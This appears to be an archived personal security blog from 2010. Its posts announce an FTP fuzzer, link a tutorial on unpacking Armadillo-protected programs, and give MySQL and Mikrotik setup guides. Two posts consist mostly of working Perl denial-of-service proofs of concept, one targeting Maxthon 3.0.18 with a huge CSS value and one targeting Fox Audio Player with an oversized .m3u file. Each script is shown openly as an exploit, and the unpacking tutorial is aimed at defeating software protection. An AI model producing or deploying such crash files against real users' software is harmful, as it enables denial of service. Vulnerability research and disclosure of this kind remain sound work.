Thursday, December 30, 2010

Monday, November 8, 2010

4n FTP Fuzzer v1.00


4n FTP Fuzzer Is Free Program, For find vulnerability in ftp server programs.
4n FTP Fuzzer v1.00 Is Desingned to find Buffer Overflow and DoS vulnerabilities.

Key Features of this fuzzer:

-Supports up to 30 FTP commands 
-High speed fuzzing
-Shows message when vulnerability happens
-Live fuzzing status and server response
-Live log
-Changeable username,password,ip and port fields
-Maximum and minimum fields
-Start/Stop buttons to control fuzzing process 

Project Sourceforge address:

https://sourceforge.net/projects/project4n

Tuesday, November 2, 2010

Maxthon 3.0.18.1000 CSS Denial of Service Vulnerability

#
#########################################################################################
# #
# Title: Maxthon 3.0.18.1000 CSS Denial of Service Vulnerability #
# Author: 4n0nym0us (Arash Sa'adatfar) #
# Developer: Maxthon International #
# Version:3.0.18 #
# Software Link: http://dl.maxthon.com/mx3/mx3.0.18.1000.exe #
# #
# Tested On: Windows 7 Ultimate 32-bit #
# #
#########################################################################################
#

#!/usr/bin/perl
my $file= "Crash.html";
my $junk= "A/" x 10000000;
open($FILE,">$file");
print $FILE "<html>\n<head>\n<style type='text/css'>\nbody {alink: ".$junk."}\n</style>\n</head>\n</html>";
print "\nCrash.html File Created successfully\n";
close($FILE);


http://www.exploit-db.com/exploits/15394/ 

Monday, October 4, 2010

Unpacking Armadillo 7 (Debug Blocker + Mem Patch + Copy Mem II)



Armadillo is a famous program packer, developed by "siliconrealms" and seems to be a good one.
In this tutorial , i will show you how to simply unpack armadillo with debug blocker, mem patch and copy mem II protections (Standard protection).

Download Link: 
http://www.speedyshare.com/files/24539992/Unpacking_Armadillo_7.rar  

Monday, September 27, 2010

Fox Audio Player 0.8.0 .m3u Denial of Service Vulnerability

#
#########################################################################################
# #
# Title: Fox Audio Player 0.8.0 .m3u Denial of Service Vulnerability #
# Author: 4n0nym0us (Arash Sa'adatfar) #
# Developer: Leandro Nini #
# #
# Software Link: #
# http://www.softpedia.com/get/Multimedia/Audio/Audio-Players/Fox-Audio-Player.shtml #
# Tested On: Windows XP Sp3 32-bit / Windows 7 Ultimate 32-bit #
# #
#########################################################################################
#
 #!/usr/bin/perl

my $file= "Crash.m3u";
my $junk= "\x41" x 2048;
open($FILE,">$file");
print $FILE $junk;
print "\nCrash.m3u File Created successfully\n";
close($FILE);


http://www.exploit-db.com/exploits/15131/ 

Thursday, September 16, 2010

Backup/Restore MySQL Database Via SSH



It's Possible To Backup/Resotre MySQL Database In SSH, There Is Tool "MySQLDump", Whenever You Install MySQL, MySQLDUMP Will Be Automatically Installed, It's In The MySQL Package.

At First, Let's See How We Can Backup The Database Via SSH, Use The Following Command In SSH:

mysqldump --opt -u username -p databasename > backupfilename.dump
I Think There Is No Need To Explain The Command!!!!
Just Enter Your Username And Your Database Name, After That, The Name Of The Dumped File And When You Enter, It Asks For The Password And After That The Database Dumps.

Now, Let's See How To Restore The Database, Another Simple Command:

mysql -u username -p databasename < backupfilename.dump

Similar To The Previous One.
It's Done Right Now, Simple Backup And Simple Restore....

Thursday, August 19, 2010

Config User Manager On Mikrotik


In This Post, We Want To Setup User Manager On Mikrotik.
User Manager, Is Accounting Program Using Radius.
You Can Download The User Manager Package From Mikrotik Website.
Let's See, How To Config User Manager On Mikrotik:
At First, Let's Enable Radius Accounting On Mikrotik:

/ ppp aaa set use-radius=yes

And PPP Profile:

/ ppp profile set default local-address=192.168.0.1

In Which, 192.168.0.1 Is Local Ip Address, That Is Used For Example For PPPoE Server Or VPN Interface Or Etc...
And Now, Let's Add radius Client To Consult User Manager for PPP service:

/ radius add service=ppp address=10.0.0.1 secret=123456789

10.0.0.1 Is The Accounting Server Ip Address, And 123456789 Is The Secret.
 
Now, Let's Add Owner To User Manager:
 
/ tool user-manager customer add login="uman-admin" password="1234" permissions=owner
 
uman-admin Is Login Name And 1234 Is The Password.
And It's Time To Add PPP server information to router list:
 
/ tool user-manager router add customer=uman-admin ip-address=10.0.0.1 shared-secret=123456789
 
uman-admin Is The Login Name, 10.0.0.1 Is The Accounting Server Ip Address And 123456789 Is The Secret.
It's Done, You Can Access To User Manager By Using:
 
http://serveripaddress/userman